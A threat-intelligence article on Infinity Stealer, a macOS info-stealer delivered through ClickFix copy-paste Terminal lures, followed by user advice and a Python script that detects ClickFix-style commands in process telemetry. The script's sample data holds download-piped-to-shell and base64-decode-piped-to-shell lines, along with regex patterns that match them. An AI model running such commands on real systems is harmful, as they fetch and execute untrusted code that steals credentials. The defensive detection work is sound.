A new macOS-targeting information stealer called Infinity Stealer has been identified targeting Apple users via the increasingly prevalent ClickFix social engineering technique. The malware is written in Python and compiled into a standalone executable using the open-source Nuitka compiler, making it harder to detect and analyse through traditional methods.
What Is Infinity Stealer
Infinity Stealer is a newly discovered info-stealer malware designed specifically to target macOS systems. Its primary objective is to harvest sensitive data from compromised machines — including browser credentials, cookies, cryptocurrency wallet data, and other personal information — and exfiltrate it to attacker-controlled infrastructure.
Key technical characteristics:
- Language: Python (compiled to a native executable via Nuitka)
- Target Platform: macOS
- Delivery Method: ClickFix social engineering lures
- Packaging: Nuitka-compiled standalone binary (disguises Python origin, complicates reverse engineering)
- Category: Info-stealer / credential harvester
The ClickFix Delivery Mechanism
ClickFix is a social engineering technique that has surged in popularity among threat actors across multiple malware campaigns. The lure presents victims with a fake browser error or warning, instructing them to:
- Copy a command from the page
- Open a terminal or run dialog
- Paste and execute the command — which silently installs malware
In the Infinity Stealer campaign, the ClickFix lure is tailored for macOS users, directing victims to open Terminal and run a command that downloads and executes the Nuitka-compiled Python payload. The lure is designed to appear as a legitimate browser fix or update instruction, exploiting user trust in browser security prompts.
Common ClickFix lure themes observed across campaigns include:
- Fake "browser update required" warnings
- Fake CAPTCHA verification failures
- Fake software activation or font installation prompts
- Impersonated cloud service error pages
Nuitka Packaging — Why It Matters
The use of Nuitka to compile the Python payload into a standalone macOS executable is a deliberate evasion technique:
- Detection evasion: Nuitka-compiled binaries do not present as Python scripts and may bypass security tools that scan for .py files or common Python malware patterns
- Analysis friction: Compiled binaries are harder to reverse-engineer than raw Python scripts, slowing down incident response and threat intelligence efforts
- Standalone deployment: No Python runtime needs to be installed on the victim machine — the executable runs natively, broadening the target population
This packaging approach is consistent with a trend of threat actors using legitimate compilation tools (PyInstaller, cx_Freeze, Nuitka) to harden Python malware against detection.
What Infinity Stealer Targets
Based on the malware's classification as an info-stealer, typical data targets for this category include:
- Browser credentials: Saved passwords, autofill data, and session cookies from Safari, Chrome, Firefox, and Brave
- Cryptocurrency wallets: Wallet files and seed phrases from popular macOS-compatible crypto wallet applications
- macOS Keychain: Stored passwords, certificates, and secure notes (where accessible)
- Application tokens: API keys and tokens stored in app configuration files
- Documents and files: Targeted file types (PDFs, spreadsheets, credential files) from common locations
Why macOS Targets Are Increasingly Valuable
The shift toward macOS-targeting malware reflects the changing threat landscape:
- Enterprise adoption: macOS has grown significantly in corporate environments, making it a higher-value target for credential theft
- Developer machines: Developers on macOS often hold cloud credentials, SSH keys, and access to internal systems — extremely valuable for attackers
- Perceived lower risk: Historical assumptions that macOS is less targeted mean some users and organisations apply less rigorous security controls
ClickFix's Rise as a Primary Delivery Vector
ClickFix has emerged as one of the most effective social engineering techniques of 2025-2026. Its effectiveness stems from:
- Psychological manipulation: Convincing users they are solving a legitimate technical problem
- Direct execution: Bypasses browser download warnings and Gatekeeper prompts by having the user manually execute the payload
- Platform agnostic: Works on Windows, macOS, and Linux by adapting the terminal instructions
- Low technical barrier: Requires no exploit — relies entirely on user action
Multiple threat groups and malware families have adopted ClickFix as their primary delivery mechanism, including campaigns distributing AsyncRAT, DarkGate, Lumma Stealer, and now Infinity Stealer.
Recommendations for macOS Users
- Never run terminal commands from websites: Legitimate browser updates and fixes are never delivered via copy-paste terminal instructions
- Be sceptical of browser error popups: Verify any error messages through official browser support channels before acting
- Enable Gatekeeper and XProtect: Ensure macOS security features are active and up to date
- Use an endpoint security solution: Install a reputable macOS AV/EDR product that can detect behavioural indicators of stealers
- Monitor for unusual Terminal activity: Unexpected Terminal processes or outbound connections after a browser warning are red flags
- Audit browser saved passwords: Consider a password manager with breach monitoring rather than browser-native password storage
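The ClickFix chain described above (browser lure, then a user-pasted Terminal command that downloads and runs the payload) and the "monitor for unusual Terminal activity" recommendation both come down to one detection: Terminal-spawned commands that pipe a download or a base64 decode into an interpreter, shortly after a browser was active. The following is an added example, not code from the article or from the campaign; the telemetry format, process names and time window are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime

# Constructed sample process telemetry (assumed format, not from the article):
# ts = start time, proc = process name, parent = parent process, cmd = command line
SAMPLE_EVENTS = [
    {"ts": "2025-11-03T10:14:02", "proc": "Safari", "parent": "launchd",
     "cmd": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"ts": "2025-11-03T10:14:40", "proc": "zsh", "parent": "Terminal",
     "cmd": "curl -fsSL https://example.invalid/fix.sh | bash"},
    {"ts": "2025-11-03T10:15:01", "proc": "zsh", "parent": "Terminal",
     "cmd": "echo aGVsbG8= | base64 -D | sh"},
    {"ts": "2025-11-03T11:30:00", "proc": "zsh", "parent": "Terminal", "cmd": "git status"},
    {"ts": "2025-11-03T11:31:00", "proc": "zsh", "parent": "Terminal", "cmd": "brew install wget"},
]

# A downloader whose output is piped straight into a shell or interpreter
DOWNLOAD_TO_INTERP = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|zsh|python3?|osascript)\b")
# A base64 decode whose output is piped straight into a shell or interpreter
DECODE_TO_INTERP = re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;&]*\|\s*(sh|bash|zsh|python3?)\b")
TERMINALS = {"Terminal", "iTerm2"}                        # assumed terminal parents
BROWSERS = {"Safari", "Google Chrome", "firefox", "Brave Browser"}  # assumed browser names


def find_clickfix_candidates(events, window_s=300):
    """Return Terminal-spawned commands that download-and-execute or decode-and-execute,
    noting whether a browser process was seen within window_s seconds beforehand."""
    parsed = sorted(events, key=lambda e: e["ts"])
    browser_times = [datetime.fromisoformat(e["ts"]) for e in parsed if e["proc"] in BROWSERS]
    hits = []
    for e in parsed:
        if e["parent"] not in TERMINALS:
            continue
        reasons = []
        if DOWNLOAD_TO_INTERP.search(e["cmd"]):
            reasons.append("download piped to interpreter")
        if DECODE_TO_INTERP.search(e["cmd"]):
            reasons.append("base64 decode piped to interpreter")
        if not reasons:
            continue  # ordinary Terminal use (git, brew, ...) is not flagged
        t = datetime.fromisoformat(e["ts"])
        if any(0 <= (t - b).total_seconds() <= window_s for b in browser_times):
            reasons.append(f"browser process seen within {window_s}s")
        hits.append({"ts": e["ts"], "cmd": e["cmd"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["ts"], hit["cmd"], "->", "; ".join(hit["reasons"]))
```

Run against the constructed sample, the two pasted-from-a-web-page style commands are flagged and the routine developer commands are not; in practice the event source would be EDR process telemetry or the macOS unified log rather than an inline list.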
Key Takeaways
- Infinity Stealer is a new macOS info-stealer delivered via ClickFix social engineering lures
- The malware is written in Python and packaged using Nuitka to evade detection and complicate analysis
- ClickFix continues to be a highly effective delivery mechanism — macOS users should treat any browser pop-up instructing terminal command execution with extreme suspicion
- The targeting of macOS reflects a broader trend of threat actors expanding beyond Windows to reach high-value developer and enterprise Apple users
- This campaign follows a well-established pattern: ClickFix lure → user-executed terminal command → payload download → stealer execution → data exfiltration
Source: BleepingComputer